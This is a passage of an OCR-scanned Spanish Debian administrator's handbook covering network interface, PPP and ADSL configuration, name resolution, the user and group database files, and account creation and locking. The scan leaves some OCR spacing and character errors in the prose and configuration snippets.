al  menos  la  direccion  IP  y  mascara  de  subred;  a  veces  tambien  se  indican  las  direcciones  de  red 
y  de  difusion.  Se  especificara  un  router  conectado  al  exterior  como  puerta  de  enlace. 


Ejemplo  8.2  Configuracion  estatica 


auto  ethO 

iface  ethO  inet  static 
address  192.168.0.3 
netmask  255.255.255.0 
broadcast  192.168.0.255 
network  192.168.0.0 
gateway  192.168.0.1 


Capltulo  8  —  Configuracion  basica:  red,  cuentas,  impresion... 
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NOTA 

Direcciones  multiples 


No  solo  es  posible  asociar  diferentes  interfaces  a  una  misma  tarjeta  de  red  fisica 
sino  que  tambien  es  posible  asignar  varias  direcciones  IP  a  una  interfaz.  Recuerde 
ademas  que  una  direccion  IP  puede  corresponder  a  cualquier  cantidad  de  nombres 
a  traves  de  DNS  y  que  dicho  nombre  tambien  puede  corresponde  a  cualquier  can¬ 
tidad  de  direcciones  IP  numericas. 


Como  puede  adivinar,  las  configuraciones  pueden  ser  bastante  complejas;  pero  se 
utilizan  estas  opciones  solo  en  casos  muy  especiales.  Los  ejemplos  citados  son  tipi- 
cos  de  las  configuraciones  usuales. 


8.2.2  Conexion  con  PPP  a  traves  de  un  modem  PSTN 

Una  conexion  punto  a  punto  (PPP)  establece  una  conexion  intermitente;  esta  es  la  solucion  mas 
comun  para  conexiones  realizadas  con  un  telefono  modem  («modem  PSTN»  ya  que  se  realiza  la 
conexion  a  traves  de  la  red  publica  conmutada  de  telefonos:  «Public  Switched  Telephone  Net- 
work»). 

Una  conexion  por  telefono  modem  necesita  una  cuenta  con  un  proveedor  de  acceso,  lo  que  in- 
cluye  un  ntimero  de  telefono,  nombre  de  usuario,  contrasenay  a  veces  el  protocolo  de  autentica- 
cion  a  utilizar.  Se  configura  dicha  conexion  utilizando  la  herramienta  pppconf  ig  en  el  paquete 
Debian  del  mismo  nombre.  De  forma  predeterminada,  configura  una  conexion  llamada  provider 
(«proveedor»  en  ingles).  En  caso  de  dudas  sobre  el  protocolo  de  autenticacion,  utilice  PAP:  la 
mayorfa  de  los  proveedores  de  servicios  de  Internet  lo  ofrecen. 

Despues  de  la  configuration,  es  posible  conectarse  utilizando  la  orden  pon  (pasandole  como  pa- 
rametro  el  nombre  de  la  conexion  cuando  el  valor  predeterminado  provider  no  sea  apropiado). 
Se  desconecta  el  enlace  con  la  orden  pot f.  Ambos  puede  ser  ejecutados  por  el  usuario  root  o 
cualquier  otro  usuario  siempre  que  pertenezcan  al  grupo  dip. 


8.2.3  Conexion  a  traves  de  un  modem  ADSL 

El  termino  generico  «modem  ADSL»  cubre  una  multitud  de  dispositivos  con  funcionalidades 
muy  diferentes.  Los  modems  mas  sencillos  de  utilizar  con  Linux  son  aquellos  con  una  interfaz 
Ethernet  (y  no  solo  una  interfaz  USB).  Tienden  a  ser  populares,  la  mayorfa  de  los  proveedores 
de  servicios  de  Internet  ADSL  prestan  (o  alquilan)  una  «caja»  con  interfaces  Ethernet.  La  confi¬ 
guracion  puede  variar  enormemente  dependiendo  del  tipo  de  modem. 


Modems  compatibles  con  PPPOE 

Algunos  modems  Ethernet  funcionan  con  el  protocolo  PPPOE  (punto  a  punto  sobre  Ether¬ 
net:  «Point  to  Point  Protocol  Over  Ethernet))).  La  herramienta  pppoeconf  (del  paquete  con  el 
mismo  nombre)  configurara  la  conexion.  Para  hacerlo,  modifica  el  archivo  /etc/ppp/peers/ 
dsl  -  provider  con  las  configuraciones  provistas  y  almacena  la  informacion  de  inicio  de  sesion 
en  los  archivos  /etc/ppp/pap-  secrets  y  /etc/ppp/chap-  secrets.  Se  recomienda  aceptar  to- 
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das  las  modificaciones  que  proponga. 

Una  vez  que  se  completa  esta  configuracion  puede  abrir  la  conexion  ADSL  con  la  orden  pon  d si  - 
providery  desconectarla  con  poff  dsl-provider. 


SUGERENCIA 

Iniciando  ppp  en  el 
arranque 


Las  conexiones  PPP  sobre  ADSL  son,  por  definicion,  intermitentes.  Ya  que  gene- 
ralmente  no  son  cobradas  por  tiempo  existen  pocas  desventajas  a  la  tentacion  de 
mantenerlas  siempre  encendidas.  El  modo  estandar  de  hacerlo  es  utilizar  el  sistema 
init. 


El  sistema  de  inicio  « i  n  i  t »  (abreviatura  de  « i  n  i  t  i  a  I  i  zat  i  o  n  » )  por  defecto  en  Jessie 
es  systemd.  Agregar  una  tarea  que  automaticamente  reinicie  la  conexion  ADSL 
es  cuestion  de  simplemente  crear  un  «unit  f i I e »  tal  como  /etc/systemd/system/ 
adsl-  connection .  service,  con  un  contenido  como  el  siguiente: 

[Unit] 

Description=ADSL  connection 


[Service] 

Type=forking 

ExecStart=/usr/sbin/pppd  call  dsl-provider 
Restart=always 

[Install] 

Want edBy=multi- user. target 


Una  vez  que  el  «unit  file»  ha  sido  definido,  es  necesario  habilitarlo  con  systemctl 
enable  adsl  -  connection.  El  ciclo  sera  iniciado  manualmente  con  systemctl  s 
tart  adsl-connection;  ademas  de  ser  iniciado  automaticamente  en  el  arranque. 

En  sistemas  que  no  usan  systemd  (incluyendo  Wheezy  y  versiones  anteriores  de 
Debian),  el  estandar  System  V  init  funciona  de  forma  distinta.  En  dichos  sistemas, 
todo  lo  que  necesita  es  ahadir  una  linea  como  las  siguientes  al  final  del  archivo 
/etc/inittab;  entonces,  en  cualquier  momento  que  se  pierda  la  conexion,  init 
se  reconectara. 

adsl : 2345 : respawn : /usr/sbin/pppd  call  dsl-provider 


Para  las  conexiones  ADSL  que  se  desconectan  diariamente,  este  metodo  reduce  la 
duracion  de  la  interrupcion. 


Modems  compatibles  con  PPTP 


El  protocolo  PPTP  (protocolo  de  tunel  punto  a  punto:  «Point-to-Point  Tunneling  Protocol»)  fue 
creado  por  Microsoft.  Desplegado  al  principio  de  ADSL  fue  reemplazado  rapidamente  por  PPPOE. 
Si  le  fuerzan  a  utilizar  este  protocolo,  revise  el  Seccion  10.2.4,  «PPTP»  pagina  245. 


Capltulo  8  —  Configuracion  basica:  red,  cuentas,  impresion... 
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Modems  compatibles  con  DHCP 


Cuando  se  conecta  un  modem  al  equipo  a  traves  de  un  cable  Ethernet  (cable  cruzado),  gene- 
ralmente  configurara  la  conexion  de  red  con  DHCP  en  el  equipo;  el  modem  automaticamente 
actuara  como  puerta  de  enlace  predeterminada  y  se  encargara  del  ruteo  (lo  que  quiere  decir 
que  gestionara  el  trafico  de  red  entre  el  equipo  e  Internet). 


VOLVER  A  LOS  CIMIENTOS  Las  tarjetas  de  red  esperan  recibir  datos  en  hilos  especi'ficos  del  cable  y  enviar  sus 
Cable  cruzado  para  una  datos  en  otros.  Cuando  conecta  un  equipo  a  una  red  local  generalmente  conecta 

conexion  Ethernet  directa  un  catde  (rect°  o  cruzado)  entre  la  tarjeta  de  red  y  un  repetidor  o  conmutador. 

Sin  embargo,  si  desea  conectar  dos  equipos  directamente  (sin  un  conmutador  o 
repetidor  intermedio)  debe  enrutar  la  serial  enviada  por  una  tarjeta  al  lado  receptor 
de  la  otra  tarjeta  y  viceversa.  Este  es  el  proposito  de  un  cable  cruzado  y  la  razon 
por  la  que  se  lo  utiliza. 

Tenga  en  cuenta  que  esta  distincion  se  ha  vuelto  casi  irrelevante  con  el  tiempo 
ya  que  las  tarjetas  de  red  modernas  pueden  detectar  el  tipo  de  cable  conectado 
y  adaptarse  de  forma  acorde,  por  lo  que  no  seria  usual  que  ambos  tipos  de  cable 
funcionen  en  una  ubicacion  dada. 


Se  pueden  utilizar  de  esta  forma  la  mayoria  de  los  «enrutadores  ADSL»  en  el  mercado  asi  como 
tambien  los  modem  ADLS  que  entregan  los  proveedores  de  servicios  de  Internet. 


8.2.4.  Configuracion  de  red  automatica  para  usuarios  itinerantes 

Muchos  ingenieros  de  Falcot  tienen  un  equipo  portatil  que,  con  propositos  profesionales,  tam¬ 
bien  utilizan  en  sus  casas.  La  configuracion  de  red  a  utilizar  varfa  segun  la  ubicacion.  En  casa 
puede  ser  una  red  inalambrica  (protegida  con  una  clave  WPA)  mientras  que  en  el  trabajo  utiliza 
una  red  cableada  para  mas  seguridad  y  ancho  de  banda. 

Para  evitar  tener  que  conectar  y  desconectar  manualmente  las  interfaces  de  red  correspondien- 
tes,  los  administradores  instalan  el  paquete  network-manager  en  estos  equipos  errantes.  Este  soft¬ 
ware  le  permite  al  usuario  cambiar  facilmente  de  una  red  a  otra  utilizando  un  pequeno  l'cono 
mostrado  en  el  area  de  notificacion  de  su  entorno  grafico.  Pulsar  en  este  l'cono  muestra  una  lista 
de  redes  disponibles  (tanto  cableadas  como  inalambricas)  para  que  pueda  elegir  una  a  utilizar. 
El  programa  guarda  la  configuracion  para  las  redes  a  las  que  el  usuario  ya  se  ha  conectado  y 
automaticamente  selecciona  la  mejor  red  disponible  cuando  pierde  la  conexion  actual. 

Para  poder  hacerlo  el  programa  esta  estructurado  en  dos  partes:  un  demonio  ejecutando  como 
root  maneja  la  activacion  y  configuracion  de  las  interfaces  de  red  y  una  interfaz  de  usuario  con- 
trola  este  demonio.  PolicyKit  gestiona  las  autorizaciones  necesarias  para  controlar  este  progra¬ 
ma,  y  Debian  configure  PolicyKit  de  forma  que  todos  los  miembros  del  grupo  «netdev»  pueden 
agregar  o  modificar  conexiones  con  Network  Manager. 

Network  Manager  sabe  como  administrar  varios  tipos  de  conexion  (DHCP,  configuracion  ma¬ 
nual,  red  local),  pero  solo  si  se  realiza  la  configuracion  desde  dentro  del  mismo  programa.  Es 
por  eso  que  ignorara  sistematicamente  todas  las  interfaces  de  red  en  el  archivo  /etc/netwo  rk/ 
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interfaces  que  desconozca.  Debido  a  que  Network  Manager  no  provee  detalles  cuando  no  se 
muestran  conexiones  de  red,  lo  mas  sencillo  es  eliminar  cualquier  configuration  del  archivo 
/etc/network/interfaces  sobre  las  interfaces  que  Network  Manager  debe  administrar. 

Note  que  se  instalara  este  programa  de  forma  predeterminada  si  selecciona  la  tarea  «Entorno 
de  escritorio»  durante  la  instalacion  inicial. 


ALTERNATIVA  Usuarios  mas  avanzados  podnan  desear  probar  el  paquete  guessnet  para  una  confi- 
Configuracion  por  «perfil  guracion  automatica  de  la  red.  Un  grupo  de  scripts  de  pruebas  determinan  el  perfil 
de  red»  de  re<^  a  act'var  y  lo  configuran  al  vuelo. 

Los  usuarios  que  prefieran  seleccionar  manualmente  un  perfil  de  red,  preferiran  el 
programa  netenv  que  pueden  encontrar  en  el  paquete  del  mismo  nombre. 


8.3.  Definition  del  nombre  de  equipo  y  configuration  del  servicio  de  nom- 
bres 

El  proposito  de  asignar  nombres  a  numeros  IP  es  hacerlos  faciles  de  recordar  para  la  gente.  En 
realidad,  una  direccion  IP  identifica  una  interfaz  de  red  asociada  con  un  dispositivo  como  una 
tarjeta  de  red.  Como  cada  equipo  puede  tener  varias  tarjetas  de  redy  varias  interfaces  en  cada 
tarjeta,  un  solo  equipo  puede  tener  varios  nombres  en  el  sistema  de  nombres  de  dominio. 

Se  identifica  a  cada  equipo,  sin  embargo,  por  un  nombre  principal  (o  «canonico»)  que  se  almace- 
na  en  el  archivo  /etc/hostname  yse  le  comunica  al  nucleo  Linux  a  traves  de  la  orden  hostname. 
El  valor  actual  esta  disponible  en  un  sistema  de  archivos  virtual  y  lo  puede  conseguir  con  la 
orden  cat  /proc/sys/kernel/hostname. 


VOLVER  A  LOS  CIMIENTOS  Se  generan  los  arboles  de  archivos  /proc/  y  /sys/  a  traves  de  sistemas  de  archi- 
/proc/  y  /sys/  sistemas  vos  <<vi rtuales».  Este  es  un  metodo  practico  para  obtener  informacion  del  nucleo 
de  archivos  virtuales  (mostrando  archivos  virtuales)  y  comunicarle  informacion  (escribiendo  en  archivos 
virtuales). 

Se  diseno  /sys/  en  particular  para  proveer  acceso  a  los  objetos  internos  del  nucleo, 
especialmente  aquellos  que  representan  los  distintos  dispositivos  en  el  sistema.  El 
nucleo  puede,  entonces,  compartir  mucha  informacion:  el  estado  de  cada  disposi¬ 
tivo  (por  ejemplo,  si  esta  en  modo  de  ahorro  de  energia),  si  es  un  dispositivo  re- 
movible,  etc.  Es  importante  saber  que  /sys/  solo  existe  desde  la  version  de  nucleo 
2.6. 


Sorprendentemente,  no  se  administra  el  nombre  de  dominio  de  la  misma  forma  sino  que  pro- 
viene  del  nombre  completo  del  equipo,  obtenido  a  traves  de  resolucion  de  nombres.  Puede  cam- 
biarlo  en  el  archivo  /etc/hosts;  simplemente  escriba  un  nombre  completo  para  el  equipo  al 
principio  de  la  lista  de  nombres  asociados  con  las  direcciones  del  equipo  como  en  el  siguiente 
ejemplo: 

127.0.0.1  localhost 

192.168.0.1  arrakis.falcot.com  arrakis 
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8.3.1  Resolucion  de  nombres 


El  mecanismo  de  resolucion  de  nombres  en  Linux  es  modular  y  puede  utilizar  varias  fuentes 
de  informacion  declaradas  en  el  archivo  /etc/nsswitch  .  conf .  La  instruccion  que  determina  la 
resolucion  de  nombres  es  hosts.  De  forma  predeterminada  contiene  files  dns  que  significa  que 
el  sistema  consultara  primero  el  archivo  /etc/hosts,  luego  los  servidores  DNS.  Otras  fuentes 
posibles  son  los  servidores  NIS/NIS+  o  LDAP. 


NOTA  Sepa  que  los  programas  especificos  para  realizar  consultas  de  DNS  (especialmente 
NSS  y  DNS  host)  no  utilizan  el  mecanismo  de  resolucion  de  nombres  estandar  (NSS).  Como 
consecuencia  no  tienen  en  cuenta  /etc/nsswitch .  conf  y,  por  lo  tanto,  tampoco 
/etc/hosts. 


Configuracion  de  servidores  DNS 

DNS  (servicio  de  nombres  de  dominio:  «Domain  Name  Service»)  es  un  servicio  distribuido  y 
jerarquico  que  asocia  nombres  a  direcciones  IP  y  viceversa.  Especificamente  puede  transformar 
un  nombre  amigable  para  las  personas  como  www.eyrolles.com  en  una  direccion  IP  real,  213.244. 
11.247. 

Para  acceder  a  la  informacion  de  DNS,  debe  tener  disponible  un  servidor  DNS  para  retransmitir 
sus  pedidos.  Lalcot  Corp  tiene  uno  propio,  pero  es  mas  probable  que  un  usuario  particular  utilice 
los  servidores  de  DNS  provistos  por  su  ISP. 

Se  indican  los  servidores  DNS  a  utilizar  en  el  archivo  /etc/resolv .  conf,  uno  por  linea,  prece- 
diendo  la  direccion  IP  con  la  palabra  clave  nameserver  como  en  el  ejemplo  a  continuacion: 

nameserver  212.27.32.176 
nameserver  212.27.32.177 
nameserver  8. 8. 8. 8 

Note  que  el  archivo  /etc/  resolv .  conf  podrfa  ser  gestionado  automaticamente  (y  sobreescrito) 
si  la  red  es  gestionada  por  NetworkManager  o  configurada  via  DHCP. 


El  archivo  /etc/hosts 

Si  no  existe  un  servidor  de  nombres  en  la  red  local  aun  es  posible  definir  una  pequena  tabla  que 
asocie  direcciones  IP  y  nombres  de  equipos  en  el  archivo  /etc/hosts,  generalmente  reservado 
para  estaciones  de  redes  locales.  La  sintaxis  de  este  archivo  es  muy  simple:  cada  linea  indica 
una  direccion  IP  especifica  seguida  de  una  lista  de  los  nombres  asociados  (el  primero  debe  ser 
«completamente  calificado»,  lo  que  significa  que  debe  incluir  el  nombre  de  dominio). 

Este  archivo  esta  disponible  aun  durante  problemas  de  red  o  cuando  no  se  puedan  alcanzar  los 
servidores  de  DNS,  pero  solo  sera  realmente  util  cuando  este  en  todos  los  equipos  en  la  red.  La 
menor  alteracion  de  asociaciones  necesitara  que  se  actualice  el  archivo  en  todos  lados.  Es  por 
esto  que  el  archivo  /etc/hosts  generalmente  solo  contiene  los  mas  importantes. 
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Este  archivo  sera  suficiente  para  un  red  pequena  que  no  este  conectada  a  Internet,  pero  con  5  o 
mas  maquinas  se  recomienda  instalar  un  servidor  de  DNS  propio. 


SUGERENCIA  Debido  a  que  las  aplicaciones  revisan  el  archivo  /etc/hosts  antes  de  realizar  pe- 
Evitando  DNS  didos  DNS,  es  posible  incluir  informacion  alii  que  sea  diferente  a  lo  que  devolverfa 
DNS,  por  lo  tanto  evitando  la  resolucion  de  nombres  normal  basada  en  DNS. 

Esto  permite,  en  el  caso  de  cambios  a  DNS  que  no  se  hayan  propagado  aun,  probar 
el  acceso  a  un  sitio  web  con  el  nombre  planeado  aun  cuando  dicho  nombre  todavia 
no  este  asociado  a  la  IP  correcta. 

Otro  posible  uso  es  redirigir  trafico  destinado  a  un  equipo  particular  a  la  maquina 
local,  evitando  de  esta  forma  cualquier  comunicacion  con  dicho  equipo.  Por  ejem- 
plo,  puede  desviar  los  nombres  de  aquellos  servidores  dedicados  a  proveer  publi- 
cidades,  evitandolas,  lo  que  resultara  en  una  navegacion  mas  fluida  y  con  menos 
distracciones. 


8.4.  Bases  de  datos  de  usuarios  y  grupos 

Generalmente  se  almacena  la  lista  de  usuarios  en  el  archivo  /etc/passwd  y  el  archivo  /etc/ 
shadow  almacena  las  contrasenas  cifradas.  Ambos  son  archivos  de  texto  en  un  formato  relativa- 
mente  simple  que  pueden  leerse  y  modificarse  con  un  editor  de  texto.  Se  muestra  cada  usuario 
en  una  linea  con  varios  campos  separados  por  dos  puntos  («:»). 


NOTA  Los  archivos  de  sistema  mencionados  en  este  capitulo  generalmente  son  archivos 
Editando  archivos  de  en  texto  piano  y  pueden  editarse  con  un  editor  de  texto.  Dada  su  importancia  para  el 
sistema  funcionamiento  intrinseco  del  sistema  siempre  es  buena  idea  tomar  precauciones 
extras  al  editar  archivos  de  sistema.  Primero,  siempre  haga  una  copia  o  respaldo 
de  un  archivo  de  sistema  antes  de  abrirlo  o  modificarlo.  Segundo,  en  servidores  o 
equipos  en  los  que  mas  de  una  persona  puedan  acceder  al  mismo  archivo  al  mismo 
tiempo,  tome  las  medidas  adecuadas  para  evitar  corrupcion  de  archivos. 

Para  este  proposito  basta  utilizar  la  orden  vipw  para  editar  el  archivo  /etc/passwd 
o  vigr  para  editar  /etc/group.  Estos  programas  bloquean  el  archivo  en  cuestion 
antes  de  ejecutar  el  editor  de  texto,  (vi  de  forma  predeterminada  a  menos  que  se 
haya  modificado  la  variable  de  entorno  EDITOR).  La  opcion  -s  permitira  editar  el 
archivo  shadow  correspondiente. 


VOLVER  A  LOS  CIMIENTOS  crypt  es  una  funcion  unidireccional  que  transforma  una  cadena  (A)  a  otra  cadena 
Crypt  una  funcion  (B)  de  forma  que  no  se  pueda  obtener  A  desde  B.  La  unica  forma  de  identificar 

unidireccional  A  es  Pr°bar  todos  sus  posibles  valores,  revisando  uno  por  uno  para  verificar  si  la 

transformacion  utilizando  dicha  funcion  produce  B  o  no.  Utiliza  hasta  8  caracteres 
como  entrada  (la  cadena  A)  y  genera  una  cadena  de  13  caracteres  imprimibles  ASCII 
(la  cadena  B). 
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8.4.1  Lista  de  usuarios:  /etc/passwd 

Esta  es  una  lista  de  los  campos  en  el  archivo  /etc/passwd: 

■  nombre  de  usuario,  por  ejemplo  rhertzog; 

■  contrasena:  esta  es  una  contrasena  cifrada  por  una  funcion  unidireccional  (crypt),  que 
utiliza  DES,  MD5,  SHA-256  o  SHA-512.  El  valor  especial  «x»  indica  que  la  contrasena  cifra¬ 
da  esta  almacenada  en  /etc/shadow; 

■  uid:  numero  unico  que  identifica  a  cada  usuario; 

■  gid:  numero  unico  del  grupo  principal  del  usuario  (de  forma  predeterminada,  Debian  crea 
un  grupo  especifico  para  cada  usuario); 

■  GECOS:  campo  de  datos  que  generalmente  contiene  el  nombre  completo  del  usuario; 

■  directorio  de  inicio  de  sesion,  asignado  al  usuario  para  almacenar  sus  archivos  personales 
(al  que  generalmente  apunta  la  variable  de  entorno  $H0ME); 

■  programa  a  ejecutar  al  iniciar  sesion.  Generalmente  es  un  interprete  de  ordenes  (conso- 
la)  que  le  da  libertad  al  usuario.  Si  especifica  /bin/false  (que  no  hace  nada  y  vuelve  el 
control  inmediatamente),  el  usuario  no  podra  iniciar  sesion. 


VOLVER  A  LOS  CIMIENTOS  Un  grupo  Unix  es  una  entidad  que  incluye  varios  usuarios  para  que  puedan  com- 

Grupo  Unix  partir  archivos  facilmente  utilizando  el  sistema  de  permisos  integrado  (obteniendo 

los  mismos  permisos).  Tambien  puede  restringir  el  uso  de  ciertos  programas  a  un 
grupo  especifico. 


8.4.2  El  archivo  de  contrasenas  ocultas  y  cifradas:  /etc/shadow 

El  archivo  /etc/shadow  contiene  los  siguientes  campos: 

■  nombre  de  usuario; 

■  contrasena  cifrada; 

■  varios  campos  que  administran  el  vencimiento  de  la  contrasena. 


DOCUMENTACION 

Estos  formatos  estan  documentados  en  las  siguientes  paginas  de  manual: 

El  formato  de  los 

passwd(5),  shadow! 5)  y  group(5). 

archivos  /etc/passwd,  / 
etc/shadow  y  /etc/group 

SEGURIDAD 

A  diferencia  de  su  contraparte  /etc/passwd,  /etc/shadow  no  puede  ser  leido 

Seguridad  del  archivo  / 
etc/shadow 

por  usuarios  normales.  Cualquiera  puede  leer  cualquier  contrasena  cifrada  en 
/etc/password;  un  «cracker»  podria  intentar  «romper»  (o  revelar)  una  contrase- 
ha  a  traves  de  alguno  de  los  metodos  de  «fuerza  bruta»  que,  de  forma  simplificada, 
adivinan  las  combinaciones  de  caracteres  utilizadas  frecuentemente.  Este  ataque 
—  Ilamado  «ataque  de  diccionario»  —  ya  no  es  posible  en  sistemas  que  utilizan 
/etc/shadow. 
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8.4.3  Modification  de  una  cuenta  o  contrasena  existente 


Los  siguientes  programas  permiten  modificar  la  information  almacenada  en  campos  especificos 
de  la  base  de  datos  de  usuarios:  passwd  le  permite  a  un  usuario  normal  cambiar  su  contrasena 
que,  a  su  vez,  actualiza  el  archivo  /etc/shadow;  chfn  (cambiar  el  nombre  completo:  «CHange 
Full  Name»),  reservado  para  el  superusuario  (root),  modifica  el  campo  GECOS.  chsh  (cambiar 
consola:  «CHange  SHell»)  le  permite  a  un  usuario  cambiar  su  consola  de  inicio  de  sesion,  sin 
embargo  las  opciones  disponibles  estaran  limitadas  a  aquellas  mencionadas  en  /etc/shells; 
el  administrador,  por  el  otro  lado,  no  esta  limitado  por  esta  restriction  y  puede  configurar  la 
consola  a  cualquier  programa  de  su  eleccion. 

Finalmente  chage  (cambiar  edad:  «CHange  AGE»)  permite  al  administrador  cambiar  la  confi¬ 
guration  de  expiracion  de  la  contrasena  (la  opcion  -I  usuario  mostrara  la  configuration  actual). 
Tambien  puede  forzar  la  expiracion  de  una  contrasena  utilizando  la  orden  passwd  - e  usuario, 
que  obligara  al  usuario  a  cambiar  su  contrasena  la  proxima  vez  que  inicie  sesion. 


8.4.4.  Desactivacion  de  una  cuenta 

Puede  llegar  a  necesitar  «desactivar  una  cuenta»  (bloquear  el  acceso  a  un  usuario)  como  casti- 
go,  para  una  investigation  o  simplemente  en  caso  de  una  ausencia  prolongada  o  definitiva  de 
un  usuario.  Una  cuenta  desactivada  significa  que  el  usuario  no  podra  iniciar  sesion  y  obtener 
acceso  a  la  maquina.  La  cuenta  se  mantiene  intacta  en  el  equipo  y  no  se  eliminaran  archivos  o 
datos;  simplemente  es  inaccesible.  Puede  lograr  esto  utilizando  passwd  -L  usuario  (bloquear: 
«lock»).  Puede  reactivar  la  cuenta  de  forma  similar,  utilizando  la  opcion  -u  (desbloquear:  «un- 
lock»). 


YENDO  MAS  ALLA  En  lugar  de  utilizar  los  archivos  usuales  para  administrar  la  lista  de  usuarios  y  gru- 

NSS  y  bases  de  datos  de  Pos  Puede  utilizar  otros  tipos  de  bases  de  datos  como  LDAP  o  db  utilizando  el  modu- 

sistema  1°  NSS  (cambio  de  servicio  de  nombres:  «Name  Service  Switch»).  Puede  encontrar 
una  lista  de  los  modulos  utilizados  en  el  archivo  /etc/nsswitch .  conf  bajo  los 
elementos  passwd,  shadow  y  group.  Revise  la  Seccion  11.7.3.1,  «Configuracion  de 
NSS»  pagina  305  para  un  ejemplo  especifico  sobre  el  uso  de  un  modulo  NSS  para 
LDAP. 


8.4.5  Lista  de  grupos: /etc/group 

Se  enumeran  los  grupos  en  el  archivo  /etc/group,  una  simple  base  de  datos  de  texto  en  un 
formato  similar  al  del  archivo  /etc/passwd  con  los  siguientes  campos: 

■  nombre  del  grupo; 

■  contrasena  (opcional):  solo  es  utilizada  para  unirse  a  un  grupo  cuando  no  es  un  miembro 
normal  (con  newg  rp  o  sg,  revise  el  recuadro  «Trabajar  con  varios  grupos»  pagina  168); 

■  gid:  numero  unico  de  identification  del  grupo; 
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lista  de  miembros:  lista  separados  por  comas  de  nombres  de  usuario  que  son  miembros 
del  grupo. 


VOLVER  A  LOS  CIMIENTOS 

Cada  usuario  puede  ser  miembro  de  varios  grupos,  uno  de  los  cuales  es  su  «grupo 

Trabajar  con  varios 
grupos 

principal*.  El  grupo  principal  de  un  usuario  se  crea  de  forma  predeterminada  du¬ 
rante  la  configuracion  inicial  del  usuario.  De  forma  predeterminada,  cada  archivo 
que  cree  el  usuario  pertenece  a  el  asi  como  tambien  a  su  grupo  principal.  Esto  no  es 
siempre  el  comportamiento  deseado;  por  ejemplo,  cuando  el  usuario  necesita  traba¬ 
jar  en  un  directorio  compartido  por  un  grupo  distinto  a  su  grupo  principal.  En  este 
caso,  el  usuario  necesita  cambiar  el  grupo  principal  utilizando  una  de  las  siguientes 
ordenes:  newgrp  que  inicia  una  nueva  consola,  o  sg  que  simplemente  ejecuta  una 
orden  utilizando  un  grupo  alternativo  que  se  provea.  Estas  ordenes  le  permiten  al 
usuario  unirse  a  un  grupo  al  que  no  pertenecen.  Si  el  grupo  esta  protegido  por  una 
contrasena  necesitaran  proveerla  antes  de  ejecutar  la  orden. 

De  forma  alternativa,  el  usuario  puede  activar  el  bit  setgid  en  el  directorio,  que 
causa  que  los  archivos  creados  en  el  pertenezcan  al  grupo  correcto  automatica¬ 
mente.  Para  mas  detalles  revise  el  recuadro  «Directorios  setgid  y  el  bit  «sticky» 
(pegajoso)»  pagina  210. 

La  orden  id  muestra  el  estado  actual  del  usuario,  con  su  identificador  personal  (la 
variable  uid),  su  grupo  principal  actual  (la  variable  gid)  y  la  lista  de  grupos  a  los 
que  pertenece  (la  variable  groups). 

Los  programas  addg  roup  y  delg  roup  agregan  o  eliminan  un  grupo  respectivamente.  g  roupmod 
modifica  la  informacion  de  un  grupo  (su identificador  o  gid).  La  orden  pa s swd  - g  grupo  cambia 
la  contrasena  del  grupo  mientras  que  pas swd  -r  -g  grupo  elimina  dicha  contrasena. 

SUGERENCIA 

El  programa  getent  (obtener  elementos:  «get  entries*)  revisa  las  bases  de  datos 

getent 

de  sistema  de  la  forma  estandar,  utilizando  las  funciones  de  la  biblioteca  apropiada 
que,  a  su  vez,  llaman  a  los  mod  u  los  NSS  configurados  en  el  archivo  /etc/ ns  switch  . 
conf.  El  programa  acepta  uno  o  dos  parametros:  el  nombre  de  la  base  de  datos  a 
revisar  y  una  posible  clave  de  busqueda.  Por  lo  tanto,  la  orden  getent  passwd 
rhertzog  proveera  la  informacion  de  la  base  de  datos  de  usuarios  sobre  el  usuario 
rhertzog. 

8.5.  Creacion  de  cuentas 

Una  de  las  primeras  acciones  que  un  administrador  necesita  completar  al  configurar  un  nuevo 
equipo  es  crear  cuentas  de  usuario.  Esto  se  realiza  generalmente  con  el  programa  add  user  que 
acepta  como  parametro  un  nombre  de  usuario  para  el  nuevo  usuario  a  crear. 

El  programa  adduse  r  realiza  unas  pocas  preguntas  antes  de  crear  la  cuenta,  pero  su  uso  es  bas- 
tante  directo.  Su  archivo  de  configuracion,  /etc/adduser.  conf,  incluye  todas  las  configura- 
ciones  interesantes:  puede  utilizarse  para  definir  automaticamente  una  cuota  para  cada  nuevo 
usuario  mediante  una  plantilla  de  usuario  o  para  cambiar  la  ubicacion  de  las  cuentas  de  usua¬ 
rio;  esto  ultimo  rara  vez  es  util  pero  puede  servir  cuando  posea  una  gran  cantidad  de  usuarios 
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y  desee,  por  ejemplo,  dividir  sus  cuentas  entre  varios  discos.  Tambien  puede  seleccionar  un  in- 
terprete  de  ordenes  predeterminada  diferente. 


VOLVER  A  LOS  CIMIENTOS 

El  termino  «cuota»  («quota»)  se  refiere  a  un  limite  en  los  recursos  del  equipo  que 

Cuota 

puede  utilizar  un  usuario.  Generalmente  se  refiere  a  espacio  en  disco. 

El  crear  una  cuenta  rellena  el  directorio  personal  de  un  usuario  con  el  contenido  de  la  plantilla 
/etc/skel/.  Esto  le  provee  al  usuario  un  conjunto  de  directories  y  archivos  de  configuracion 
estandar. 

En  algunos  casos,  sera  util  agregar  un  usuario  a  un  grupo  (diferente  a  su  grupo  «principal»)  para 
proveerle  permisos  adicionales.  Por  ejemplo,  un  usuario  que  pertenece  al  grupo  audio  puede 
acceder  dispositivos  de  audio  (revise  el  recuadro  «Permisos  de  acceso  a  dispositivos»  pagina 
169).  Puede  conseguirlo  ejecutando  add  user  usuario  grupo. 


VOLVER  A  LOS  CIMIENTOS  En  Unix  se  representa  cada  dispositivo  de  hardware  periferico  con  un  archivo  es- 
Permisos  de  acceso  a  pecial  generalmente  almacenado  en  el  arbol  de  archivos  bajo  /dev/  (dispositivos: 

dispositivos  «DEVices»).  Existen  dos  tipos  especiales  de  archivos  segun  la  naturaleza  del  dis¬ 
positivo:  archivos  «modo  caracter»  y  «modo  bloque»,  cada  modo  solo  permite  un 
conjunto  limitado  de  operaciones.  Mientras  que  el  modo  caracter  limita  la  interac- 
cion  a  operaciones  de  lectura  y  escritura,  el  modo  bloque  tambien  permite  busque- 
das  entre  los  datos  disponibles.  Finalmente,  cada  archivo  especial  tiene  asociado 
dos  numeros  («mayor»  y  «menor»)  que  identifica  para  el  nucleo  al  dispositivo  de 
forma  unica.  Tal  archivo,  creado  con  el  programa  mknod  simplemente  contiene  un 
nombre  simbolico  (y  mas  amigable  para  las  personas). 

Los  permisos  de  un  archivo  especial  estan  asociados  a  los  permisos  necesarios  para 
acceder  al  dispositivo  en  si  mismo.  Por  lo  tanto,  un  archivo  como  /dev/mixer  que 
representa  un  mezclador  de  audio  solo  tiene  permisos  de  lectura  y  escritura  para  el 
